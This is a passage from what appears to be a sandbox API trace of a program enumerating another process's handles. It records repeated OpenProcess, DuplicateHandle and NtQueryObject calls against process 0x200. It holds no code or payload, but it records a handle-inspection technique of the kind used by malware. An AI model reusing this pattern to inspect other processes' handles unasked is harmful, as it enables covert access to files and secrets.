lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.167] GetTickCount () returned 0xe86326 [0113.167] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.167] GetTickCount () returned 0xe86326 [0113.167] GetTickCount () returned 0xe86326 [0113.167] CloseHandle (hObject=0x1b8) returned 1 [0113.167] GetTickCount () returned 0xe86326 [0113.167] CloseHandle (hObject=0x198) returned 1 [0113.167] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.167] GetTickCount () returned 0xe86326 [0113.167] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.167] GetTickCount () returned 0xe86326 [0113.167] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.167] GetTickCount () returned 0xe86326 [0113.168] GetTickCount () returned 0xe86326 [0113.168] CloseHandle (hObject=0x1b8) returned 1 [0113.168] GetTickCount () returned 0xe86326 [0113.168] CloseHandle (hObject=0x198) returned 1 [0113.168] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.168] GetTickCount () returned 0xe86326 [0113.168] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x190, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.168] GetTickCount () returned 0xe86326 [0113.168] GetTickCount () returned 0xe86326 [0113.168] CloseHandle (hObject=0x198) returned 1 [0113.168] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.168] GetTickCount () returned 0xe86326 [0113.168] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x194, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.168] GetTickCount () returned 0xe86326 [0113.168] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.168] GetTickCount () returned 0xe86326 [0113.169] GetTickCount () returned 0xe86326 [0113.169] CloseHandle (hObject=0x1b8) returned 1 [0113.169] GetTickCount () returned 0xe86326 [0113.169] CloseHandle (hObject=0x198) returned 1 [0113.169] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.169] GetTickCount () returned 0xe86326 [0113.169] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.169] GetTickCount () returned 0xe86326 [0113.169] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.169] GetTickCount () returned 0xe86326 [0113.170] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.170] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.170] GetTickCount () returned 0xe86326 [0113.170] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.170] GetTickCount () returned 0xe86326 [0113.170] CloseHandle (hObject=0x1b8) returned 1 [0113.170] GetTickCount () returned 0xe86326 [0113.170] CloseHandle (hObject=0x198) returned 1 [0113.170] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.170] GetTickCount () returned 0xe86326 [0113.170] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.170] GetTickCount () returned 0xe86326 [0113.170] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.170] GetTickCount () returned 0xe86326 [0113.171] GetTickCount () returned 0xe86326 [0113.171] CloseHandle (hObject=0x1b8) returned 1 [0113.171] GetTickCount () returned 0xe86326 [0113.171] CloseHandle (hObject=0x198) returned 1 [0113.171] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.171] GetTickCount () returned 0xe86326 [0113.171] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.171] GetTickCount () returned 0xe86326 [0113.171] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.171] GetTickCount () returned 0xe86326 [0113.171] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.171] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.171] GetTickCount () returned 0xe86326 [0113.171] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.171] GetTickCount () returned 0xe86326 [0113.172] CloseHandle (hObject=0x1b8) returned 1 [0113.172] GetTickCount () returned 0xe86326 [0113.172] CloseHandle (hObject=0x198) returned 1 [0113.172] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.172] GetTickCount () returned 0xe86326 [0113.172] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.172] GetTickCount () returned 0xe86326 [0113.172] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.172] GetTickCount () returned 0xe86326 [0113.172] GetTickCount () returned 0xe86326 [0113.172] CloseHandle (hObject=0x1b8) returned 1 [0113.172] GetTickCount () returned 0xe86326 [0113.172] CloseHandle (hObject=0x198) returned 1 [0113.172] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.173] GetTickCount () returned 0xe86326 [0113.173] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.173] GetTickCount () returned 0xe86326 [0113.173] GetTickCount () returned 0xe86326 [0113.173] CloseHandle (hObject=0x198) returned 1 [0113.173] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.173] GetTickCount () returned 0xe86326 [0113.173] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.173] GetTickCount () returned 0xe86326 [0113.173] GetTickCount () returned 0xe86326 [0113.173] CloseHandle (hObject=0x198) returned 1 [0113.173] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.173] GetTickCount () returned 0xe86326 [0113.173] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.173] GetTickCount () returned 0xe86326 [0113.174] GetTickCount () returned 0xe86326 [0113.174] CloseHandle (hObject=0x198) returned 1 [0113.174] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.174] GetTickCount () returned 0xe86326 [0113.174] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.174] GetTickCount () returned 0xe86326 [0113.174] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.174] GetTickCount () returned 0xe86326 [0113.174] GetTickCount () returned 0xe86326 [0113.174] CloseHandle (hObject=0x1b8) returned 1 [0113.174] GetTickCount () returned 0xe86326 [0113.174] CloseHandle (hObject=0x198) returned 1 [0113.174] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.174] GetTickCount () returned 0xe86326 [0113.175] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.175] GetTickCount () returned 0xe86326 [0113.175] GetTickCount () returned 0xe86326 [0113.175] CloseHandle (hObject=0x198) returned 1 [0113.175] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.175] GetTickCount () returned 0xe86326 [0113.175] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.175] GetTickCount () returned 0xe86326 [0113.175] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.175] GetTickCount () returned 0xe86326 [0113.175] GetTickCount () returned 0xe86326 [0113.175] CloseHandle (hObject=0x1b8) returned 1 [0113.175] GetTickCount () returned 0xe86326 [0113.176] CloseHandle (hObject=0x198) returned 1 [0113.176] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.176] GetTickCount () returned 0xe86326 [0113.176] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.176] GetTickCount () returned 0xe86326 [0113.176] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.176] GetTickCount () returned 0xe86326 [0113.176] GetTickCount () returned 0xe86326 [0113.176] CloseHandle (hObject=0x1b8) returned 1 [0113.176] GetTickCount () returned 0xe86326 [0113.176] CloseHandle (hObject=0x198) returned 1 [0113.176] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.176] GetTickCount () returned 0xe86326 [0113.176] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.176] GetTickCount () returned 0xe86326 [0113.177] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.177] GetTickCount () returned 0xe86326 [0113.177] GetTickCount () returned 0xe86326 [0113.177] CloseHandle (hObject=0x1b8) returned 1 [0113.177] GetTickCount () returned 0xe86326 [0113.177] CloseHandle (hObject=0x198) returned 1 [0113.177] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.177] GetTickCount () returned 0xe86326 [0113.177] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.177] GetTickCount () returned 0xe86326 [0113.177] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.177] GetTickCount () returned 0xe86326 [0113.178] GetTickCount () returned 0xe86326 [0113.178] CloseHandle (hObject=0x1b8) returned 1 [0113.178] GetTickCount () returned 0xe86326 [0113.178] CloseHandle (hObject=0x198) returned 1 [0113.178] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.178] GetTickCount () returned 0xe86326 [0113.178] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.178] GetTickCount () returned 0xe86326 [0113.178] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.178] GetTickCount () returned 0xe86326 [0113.178] GetTickCount () returned 0xe86326 [0113.178] CloseHandle (hObject=0x1b8) returned 1 [0113.178] GetTickCount () returned 0xe86326 [0113.178] CloseHandle (hObject=0x198) returned 1 [0113.179] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.179] GetTickCount () returned 0xe86326 [0113.179] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.179] GetTickCount () returned 0xe86326 [0113.179] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.179] GetTickCount () returned 0xe86326 [0113.179] GetTickCount () returned 0xe86326 [0113.179] CloseHandle (hObject=0x1b8) returned 1 [0113.179] GetTickCount () returned 0xe86336 [0113.179] CloseHandle (hObject=0x198) returned 1 [0113.179] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.179] GetTickCount () returned 0xe86336 [0113.179] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.180] GetTickCount () returned 0xe86336 [0113.180] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.180] GetTickCount () returned 0xe86336 [0113.180] GetTickCount () returned 0xe86336 [0113.180] CloseHandle (hObject=0x1b8) returned 1 [0113.180] GetTickCount () returned 0xe86336 [0113.180] CloseHandle (hObject=0x198) returned 1 [0113.180] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.180] GetTickCount () returned 0xe86336 [0113.180] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.180] GetTickCount () returned 0xe86336 [0113.180] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.180] GetTickCount () returned 0xe86336 [0113.180] GetTickCount () returned 0xe86336 [0113.181] CloseHandle (hObject=0x1b8) returned 1 [0113.181] GetTickCount () returned 0xe86336 [0113.181] CloseHandle (hObject=0x198) returned 1 [0113.181] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.181] GetTickCount () returned 0xe86336 [0113.181] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.181] GetTickCount () returned 0xe86336 [0113.181] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.181] CloseHandle (hObject=0x1b8) returned 1 [0113.181] CloseHandle (hObject=0x198) returned 1 [0113.181] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.181] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.182] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.182] CloseHandle (hObject=0x1b8) returned 1 [0113.182] CloseHandle (hObject=0x198) returned 1 [0113.182] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.182] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.182] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.182] CloseHandle (hObject=0x1b8) returned 1 [0113.182] CloseHandle (hObject=0x198) returned 1 [0113.182] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.183] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.183] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.183] CloseHandle (hObject=0x1b8) returned 1 [0113.183] CloseHandle (hObject=0x198) returned 1 [0113.183] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.183] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.183] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.184] CloseHandle (hObject=0x1b8) returned 1 [0113.184] CloseHandle (hObject=0x198) returned 1 [0113.184] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.184] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.184] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.184] CloseHandle (hObject=0x1b8) returned 1 [0113.184] CloseHandle (hObject=0x198) returned 1 [0113.184] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.185] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x200, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.185] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.185] CloseHandle (hObject=0x1b8) returned 1 [0113.185] CloseHandle (hObject=0x198) returned 1 [0113.185] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.185] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x204, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.185] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.185] CloseHandle (hObject=0x1b8) returned 1 [0113.186] CloseHandle (hObject=0x198) returned 1 [0113.186] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.186] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x208, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.186] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.186] CloseHandle (hObject=0x1b8) returned 1 [0113.186] CloseHandle (hObject=0x198) returned 1 [0113.186] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.186] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.186] CloseHandle (hObject=0x198) returned 1 [0113.186] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.187] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x210, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.187] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.187] CloseHandle (hObject=0x1b8) returned 1 [0113.187] CloseHandle (hObject=0x198) returned 1 [0113.187] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.187] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x214, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.188] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.188] CloseHandle (hObject=0x1b8) returned 1 [0113.188] CloseHandle (hObject=0x198) returned 1 [0113.188] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.188] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x218, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.188] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.188] CloseHandle (hObject=0x1b8) returned 1 [0113.188] CloseHandle (hObject=0x198) returned 1 [0113.189] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.189] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.189] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.189] CloseHandle (hObject=0x1b8) returned 1 [0113.189] CloseHandle (hObject=0x198) returned 1 [0113.189] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.189] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x220, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.189] CloseHandle (hObject=0x198) returned 1 [0113.197] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.197] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x224, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, 